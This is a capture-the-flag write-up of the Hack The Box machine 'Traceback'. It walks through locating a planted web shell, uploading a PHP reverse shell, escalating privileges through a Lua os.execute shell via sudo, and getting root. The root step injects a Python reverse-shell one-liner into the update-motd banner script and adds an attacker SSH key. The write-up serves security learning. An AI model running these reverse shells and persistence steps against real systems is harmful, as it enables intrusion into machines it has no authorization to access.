Traceback was a fun and exciting challenge box. A unique way to get root and as always, I learnt new things while attempting the challenge.
Summary
- Perform a directory brute force with a list of names of common web shells
- Login to attackers’ web shells
- Upload and execute php reverse shell
- Get to “sysadmin” user via scripting language Lua
- Get root via manipulated ssh banner file and ssh login/connection.
Foothold
We start with an Nmap scan to discover and enumerate running services.
nmap -sC -sV -oA traceback 10.10.10.181
Ports 80 and 22 are open which run HTTP and ssh respectively, therefore we head over to port 80 to see what’s running on the webserver.
Okay, the website has been hacked. “CTRL-U”, to view the source code and there’s nothing of interest except this little piece of information:
This means that the attacker(s) must have a way of gaining unauthorized access to the site and they were kind enough to let us also have access 😏. But how do we find this backdoor/unauthorized access? Notice the Xh4H in the source code picture, that seems like a name so we just google it. Following the link, it leads to a tweet about a Github repository of collection of web shells. https://github.com/TheBinitGhimire/Web-Shells “Some of the best web shells that you might need”.
Webshell: A web shell is a malicious program that when uploaded to a web server, gives attackers remote access to the web server’s
file system, directories, files etc.
So, we need to find out which web shell in the github repo the attacker (Xh4h) uploaded. We Make a list with all the web shells
in the repository and use the list as our bruteforce list with gobuster (web file/directory bruteforce tool).
Good, we’ve found a directory. On visiting the path, we are presented with a login page, well I just guessed admin:admin as credentials and it worked,
we are logged into the web shell and now we have access to the server’s filesystem.
Well, you can immediately start using the web shell to traverse directories and find more files, but I wanted a command-line interface so I uploaded a
reverse shell, set up my listener and got a connection.
User
Now we have a shell on the box as the “webadmin” user. Remember the homepage of the server was just a static site, so nothing of interest
in the “/var/www/html” directory on the box. Moving over to our current user’s home directory “/home/webadmin”,
there’s a note from the sysadmin user talking about a tool to practice Lua (programming language). Also if you notice we have read and write permissions(-rw) on the “.bash_history” file (Always check if you can read the .bash_history file for any user).
So basically, the “bash_history” file contains the history of executed commands. In this particular file, we see the command:
sudo -u sysadmin /home/sysadmin/luvit privesc.lua
which means that the tool luvit is used to execute the file privesc.lua on behalf of the sysadmin user (sudo -u sysadmin). But immediately, the file is removed (rm privesc.lua). Hmmm, remember the note.txt, So we just create a lua file with the following command:
touch myfile.lua
Then I googled “lua linux privilege escalation”, followed the first link which led to gtfobins (a nice resource for checking unix binaries that are exploitable). And then ran the following command to put the ‘os.execute(“/bin/sh”)’ command into myfile.lua:
echo “os.execute(\"/bin/sh\")” >> myfile.lua
Finally, we execute the command:
sudo -u sysadmin /home/sysadmin/luvit myfile.luaBoom!! We are now the sysadmin user and we can read the user flag.
Root
Using pspy (a linux process monitoring tool), a particular process becomes of interest.
To transfer pspy or any file to a machine, you start a python http server on your own machine
python3 -m http.serverIt listens on port 8000 by default.
Then on the victim’s machine/hackthebox machine, go to a writable directory preferrably /tmp
and run:
wget http://YOUR-IP:8000/THE-FILE-YOU-WANT-TO-TRANSFER
Back to pspy’s output. What the command does is to copy every file in the “/var/backups/.update-motd.d/” directory to the “/etc/update-motd.d/”
directory. And this command executes every 30 seconds (sleep 30). In the “/var/backups/.update-motd.d/” directory there is a bunch
of files but there’s nothing we can do because the files are owned by root and we (sysadmin) have only read permissions. Going over to the
“/etc/update-motd.d/” directory, we see the same files as the previous directory but now we have both read and write access to the files.
After much assessment and trying to understand what the files are, the “00-header” file becomes of more importance because we see our hackers name(Xh4H) in it. What this file does is to
describe/print the operating system release/version and execute any commands in it whenever a login (via ssh) is made to the linux server (this box).
Recall we have write permissions to this file, so what I did was copy a python reverse shell into the “00-header” file, generate ssh keys on my system for the box, transfer the public key to the box, add it to the “authorized_keys” file for the “sysadmin” user, setup my netcat listener, and then try to ssh into the box from my system.
1) ssh-keygen -t rsa (passphrase required, i used "password")
i) Tranfer public key using method described above to transfer pspy2) cat id_rsa.pub >> /home/sysadmin/.ssh/authorized_keys3) echo python3 -c "'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR-IP-HERE\",PORT-HERE));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" >> 00-header4) nc -nlvp 80085) ssh -i id_rsa sysadmin@10.10.10.181
Remember the command runs every 30 seconds, so all the above commands have to be run before 30 seconds especially from command no.(4) and,
Boom!! we get a connection, and we are now the root user.
